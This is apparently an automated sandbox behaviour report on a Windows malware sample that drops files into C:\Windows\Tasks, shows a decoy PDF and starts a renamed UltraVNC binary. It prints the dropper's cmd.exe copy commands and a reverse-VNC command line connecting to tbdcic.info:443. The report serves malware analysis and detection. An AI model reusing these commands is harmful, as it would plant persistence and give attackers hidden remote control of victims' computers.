                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,18_2_00007FF6DC0D3550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D18A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,18_2_00007FF6DC0D18A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,18_2_00007FF6DC0D34B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D3550 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetVersionExA,ExitWindowsEx,23_2_00007FF6DC0D3550
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D18A0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,23_2_00007FF6DC0D18A0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0D34B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,23_2_00007FF6DC0D34B0
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_004011D1 GetDiskFreeSpaceExW,SendMessageW,0_2_004011D1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,18_2_00007FF6DC0D2D00
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,CreateServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,23_2_00007FF6DC0D2D00
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC129BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,18_2_00007FF6DC129BC0
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_0040385E _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_0040385E
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00401DC9 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401DC9
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Downloads\Lom.pdfJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2636:120:WilError_03
                          Source: C:\Windows\Tasks\sync_browser.exeMutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000Jump to behavior
                          Source: 7q551ugrWe.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sync_browser.exe")
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: 7q551ugrWe.exeReversingLabs: Detection: 23%
                          Source: sync_browser.exeString found in binary or memory: -stopservice
                          Source: sync_browser.exeString found in binary or memory: -startservice
                          Source: sync_browser.exeString found in binary or memory: -install
                          Source: sync_browser.exeString found in binary or memory: -stopservice
                          Source: sync_browser.exeString found in binary or memory: -startservice
                          Source: sync_browser.exeString found in binary or memory: -install
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeFile read: C:\Users\user\Desktop\7q551ugrWe.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\7q551ugrWe.exe "C:\Users\user\Desktop\7q551ugrWe.exe"
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1760,i,4170063215735319094,17128991866469409438,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"Jump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmdJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1760,i,4170063215735319094,17128991866469409438,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: apphelp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winmm.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: userenv.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dwmapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: sspicli.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winsta.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: napinsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wshbth.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: mswsock.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winrnr.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wldp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched20.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: usp10.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: msls31.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: riched32.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winmm.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: version.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: userenv.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dwmapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: napinsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: wshbth.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: mswsock.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: winrnr.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\Tasks\sync_browser.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\cmd.exeFile written: C:\Windows\Tasks\UltraVNC.iniJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeFile opened: C:\Windows\SYSTEM32\RICHED32.DLL
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: 7q551ugrWe.exeStatic file information: File size 1664495 > 1048576
                          Source: Binary string: conhost.pdbUGP source: 7q551ugrWe.exe, 00000000.00000003.2107015272.000000000266C000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr
                          Source: Binary string: conhost.pdb source: 7q551ugrWe.exe, 00000000.00000003.2107015272.000000000266C000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr
                          Source: Nfe70s.UFVVkM.0.drStatic PE information: 0x998FF43F [Tue Aug 22 20:17:03 2051 UTC]
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
                          Source: 7q551ugrWe.exeStatic PE information: real checksum: 0x2af97 should be: 0x19ec51
                          Source: Nfe70s.UFVVkM.0.drStatic PE information: section name: .didat
                          Source: Nfe70s.UFVVkM.2.drStatic PE information: section name: .didat
                          Source: conhost.exe.6.drStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00413660 push eax; ret 0_2_0041368E
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0CFEF1 push rcx; ret 18_2_00007FF6DC0CFEF2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E07F8 push rbp; iretd 18_2_00007FF6DC0E07F9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E12EF push rbp; iretd 18_2_00007FF6DC0E12F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0DDC11 push rax; ret 18_2_00007FF6DC0DDC13
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0DDC01 push rcx; ret 18_2_00007FF6DC0DDC02
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E1400 push rbp; iretd 18_2_00007FF6DC0E1401
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0DDC21 push rsp; ret 18_2_00007FF6DC0DDC23
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0F8CF9 push 8B481074h; iretd 18_2_00007FF6DC0F8CFF
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0CFEF1 push rcx; ret 23_2_00007FF6DC0CFEF2
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E07F8 push rbp; iretd 23_2_00007FF6DC0E07F9
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E12EF push rbp; iretd 23_2_00007FF6DC0E12F0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0DDC11 push rax; ret 23_2_00007FF6DC0DDC13
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0DDC01 push rcx; ret 23_2_00007FF6DC0DDC02
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E1400 push rbp; iretd 23_2_00007FF6DC0E1401
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0DDC21 push rsp; ret 23_2_00007FF6DC0DDC23
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0F8CF9 push 8B481074h; iretd 23_2_00007FF6DC0F8CFF

                          Persistence and Installation Behavior

                          barindex
                          Drops executables to the windows directory (C:\Windows) and starts them
